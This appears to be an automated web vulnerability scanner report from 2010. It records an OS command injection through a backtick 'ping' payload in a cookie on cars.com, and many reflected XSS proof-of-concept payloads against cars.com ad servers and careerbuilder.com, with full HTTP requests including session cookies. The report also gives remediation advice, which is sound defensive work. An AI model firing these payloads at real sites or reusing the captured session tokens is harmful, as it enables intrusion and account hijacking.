The Registration cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the Registration cookie. The application took 47237 milliseconds to respond to the request, compared with 1819 milliseconds for the original request, indicating that the injected command caused a time delay.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
Request
GET /go/advice/Story.jsp?section=safe&story=crashRatings&subject=crash&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=`ping%20-c%2020%20127.0.0.1`; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a0f'-alert(1)-'3c4a4687659 was submitted in the i parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659 HTTP/1.1 Host: 66.70.86.62 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 00:21:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/javascript; charset=utf-8 Content-Length: 609
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf4'-alert(1)-'7eba7def320 was submitted in the k parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a HTTP/1.1 Host: 66.70.86.62 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 00:21:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/javascript; charset=utf-8 Content-Length: 609
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd277\"%3balert(1)//95814bce789 was submitted in the REST URL parameter 1. This input was echoed as fd277\\";alert(1)//95814bce789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2848b\"%3balert(1)//7913391f575 was submitted in the REST URL parameter 2. This input was echoed as 2848b\\";alert(1)//7913391f575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
2.5. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d74\"%3balert(1)//bb209c18b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94d74\\";alert(1)//bb209c18b07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 916f0\"%3balert(1)//f22c0a0d6c2 was submitted in the REST URL parameter 1. This input was echoed as 916f0\\";alert(1)//f22c0a0d6c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver916f0\"%3balert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 02:43:47 GMT X-DirectServer: cvcars_DS0 Content-Type: application/x-javascript Content-Length: 373 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d38f\"%3balert(1)//1539b4dcad0 was submitted in the REST URL parameter 2. This input was echoed as 1d38f\\";alert(1)//1539b4dcad0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random1d38f\"%3balert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 00:21:18 GMT X-DirectServer: cvcars_DS1 Content-Type: application/x-javascript Content-Length: 373 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
2.8. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0836\"%3balert(1)//e13954b58bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0836\\";alert(1)//e13954b58bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\"%3balert(1)//e13954b58bb=1 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 00:21:14 GMT X-DirectServer: cvcars_DS1 Content-Type: application/x-javascript Content-Length: 376 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0050\"%3balert(1)//7ed6d85a66a was submitted in the REST URL parameter 1. This input was echoed as c0050\\";alert(1)//7ed6d85a66a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserverc0050\"%3balert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 00:21:17 GMT X-DirectServer: cvcars_DS3 Content-Type: application/x-javascript Content-Length: 609 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40578\"%3balert(1)//3b419f8cdbf was submitted in the REST URL parameter 2. This input was echoed as 40578\\";alert(1)//3b419f8cdbf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random40578\"%3balert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 00:21:19 GMT X-DirectServer: cvcars_DS1 Content-Type: application/x-javascript Content-Length: 609 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
2.11. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a4e\"%3balert(1)//11eb5132b70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71a4e\\";alert(1)//11eb5132b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\"%3balert(1)//11eb5132b70=1 HTTP/1.1 Host: acc.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Mon, 15 Nov 2010 02:43:46 GMT X-DirectServer: cvcars_DS0 Content-Type: application/x-javascript Content-Length: 612 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e45a\"%3balert(1)//cb7a68796a2 was submitted in the REST URL parameter 1. This input was echoed as 3e45a\\";alert(1)//cb7a68796a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3eec\"%3balert(1)//f976d163c71 was submitted in the REST URL parameter 2. This input was echoed as d3eec\\";alert(1)//f976d163c71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
2.14. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4a5\"%3balert(1)//96265a28453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f4a5\\";alert(1)//96265a28453 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51115"%20a%3db%20d5b4f13e8c1 was submitted in the lr parameter. This input was echoed as 51115" a=b d5b4f13e8c1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhf48aa51115"%20a%3db%20d5b4f13e8c1 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 235413 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: BEAR35 Date: Sun, 14 Nov 2010 23:28:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270f0"%20a%3db%20e3d0cbef4fe was submitted in the lr parameter. This input was echoed as 270f0" a=b e3d0cbef4fe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa270f0"%20a%3db%20e3d0cbef4fe HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 195258 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR10 Date: Sun, 14 Nov 2010 23:08:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53581'-alert(1)-'707915ba59b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196172 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR35 Date: Sun, 14 Nov 2010 23:12:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cca06'%3b229e8665375 was submitted in the REST URL parameter 2. This input was echoed as cca06';229e8665375 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
